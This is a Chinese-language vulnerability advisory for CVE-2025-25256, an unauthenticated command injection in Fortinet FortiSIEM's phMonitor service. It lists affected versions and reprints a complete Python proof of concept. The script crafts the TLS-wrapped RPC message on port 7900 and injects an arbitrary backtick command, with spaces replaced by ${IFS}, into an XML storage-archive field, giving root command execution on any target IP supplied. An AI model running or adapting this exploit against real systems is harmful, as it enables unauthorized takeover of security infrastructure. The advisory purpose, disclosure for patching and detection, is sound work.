0x00 前言
Fortinet FortiSIEM是一款由Fortinet开发的安全信息和事件管理(SIEM)平台,旨在整合安全运营中心(SOC)和网络运营中心(NOC)功能,为企业提供全面的资通讯基础设施安全监控、威胁检测和自动化响应能力。
0x01 漏洞描述
该漏洞源于Fortinet FortiSIEM系统的phMonitor组件在处理请求时存在输入校验缺陷,属于典型的操作系统命令注入漏洞。
具体表现为phMonitor进程中handleStorageArchiveRequest函数的输入过滤机制不完善,使得未经身份验证的攻击者能够通过精心构造的CLI请求(通过监听TCP/7900端口的自定义RPC协议传输,并封装于TLS中),在未授权情况下触发命令注入。
由于该服务以root权限运行,攻击者可借此执行任意命令,可能导致数据泄露、服务器控制权被接管等严重后果。
0x02 CVE编号
CVE-2025-25256
0x03 影响版本
5.4.0 <= FortiSIEM < 6.7.10
7.0.0 <= FortiSIEM < 7.0.4
7.1.0 <= FortiSIEM < 7.1.8
7.2.0 <= FortiSIEM < 7.2.6
7.3.0 <= FortiSIEM < 7.3.2
0x04 漏洞详情
POC:
https://github.com/watchtowrlabs/watchTowr-vs-FortiSIEM-CVE-2025-25256
import ssl
import argparse
import socket
def build_message(payload):
header_values = [
90,
len(payload),
1075724911,
0
]
header = b''.join(val.to_bytes(4, byteorder='little') for val in header_values)
return header + payload.encode()
XML_TEMPLATE = """
<root>
<archive_storage_type>nfs</archive_storage_type>
<archive_nfs_server_ip>127.0.0.1</archive_nfs_server_ip>
<archive_nfs_archive_dir>`{peanut}`</archive_nfs_archive_dir>
<scope>local</scope>
</root>
"""
def exploit(target, xml_payload):
context = ssl.create_default_context()
context.check_hostname = False
context.verify_mode = ssl.CERT_NONE
with socket.create_connection((target, 7900)) as sock:
with context.wrap_socket(sock, server_hostname=target) as ssock:
message = build_message(xml_payload)
ssock.sendall(message)
print("[+] Packet Sent! ^-^")
try:
response = ssock.recv(1024)
except Exception:
print("[!] Something went wrong!")
banner = """ __ ___ ___________
__ _ ______ _/ |__ ____ | |_\\__ ____\\____ _ ________
\\ \\/ \\/ \\__ \\ ___/ ___\\| | \\| | / _ \\ \\/ \\/ \\_ __ \\
\\ / / __ \\| | \\ \\___| Y | |( <_> \\ / | | \\/
\\/\\_/ (____ |__| \\___ |___|__|__ | \\__ / \\/\\_/ |__|
\\/ \\/ \\/
watchTowr-vs-FortiSIEM-CVE-2025-25256.py
(*) FortiSIEM Unauthenticated Remote Command Execution Detection Artifact Generator
- Sina Kheirkhah (@SinSinology) of watchTowr (@watchTowrcyber)
CVEs: [CVE-2025-25256]
"""
print(banner)
parser = argparse.ArgumentParser(description="Detection Artifact Generator for CVE-2025-25256")
parser.add_argument('-r', '--target', required=True, help='Target IP address')
parser.add_argument('-c', '--command', required=False, default="peanutioc", help='Command to execute')
args = parser.parse_args()
c = args.command.replace(' ', '${IFS}')
xml_payload = XML_TEMPLATE.format(peanut=c)
exploit(args.target, xml_payload)
0x05 参考链接
https://fortiguard.fortinet.com/psirt/FG-IR-25-152